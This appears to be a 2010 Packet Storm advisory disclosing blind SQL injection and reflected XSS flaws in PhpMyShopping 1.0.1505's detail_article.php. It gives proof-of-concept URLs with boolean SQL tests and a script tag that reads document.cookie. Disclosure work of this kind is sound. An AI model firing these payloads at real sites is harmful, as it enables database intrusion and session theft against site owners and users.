PhpMyShopping 1.0.1505 Cross Site Scripting / SQL Injection

2010-10-01T00:00:00
ID PACKETSTORM:94438
Type packetstorm
Reporter Metropolis
Modified 2010-10-01T00:00:00

Description

                                        
                                            `####################################################################  
.:. Author : Metropolis  
.:. Home : www.metropolis.fr.cr  
.:. Script : PhpMyShopping  
.:. Version : v1.0.1505  
.:. Download Script: http://www.phpmyshopping.org/night_build/PhpMyShopping_mono_boutique_v1.0.1505.tar.gz  
.:. Bug Type : Multiple Vulnerabilities / Blind SQL Injections / XSS  
  
####################################################################  
  
===[ Blind Sql Injection ]===  
  
SQL Error =>  
  
/detail_article.php?C=3&P=7'  
  
www.site.com/detail_article.php?C=3&P=7 [Blind]  
  
[Demo] :  
  
www.site.com/detail_article.php?C=3&P=1 and 1=1 <-- true  
  
www.site.com/detail_article.php?C=3&P=1 and 1=2 <-- false  
  
===[ XSS ]===  
  
www.site.com/detail_article.php?C=3&P=7 [XSS]  
  
[Demo] :  
  
www.site.com/detail_article.php?C=3&P=7"><script>alert(document.cookie);</script>  
  
  
####################################################################  
  
`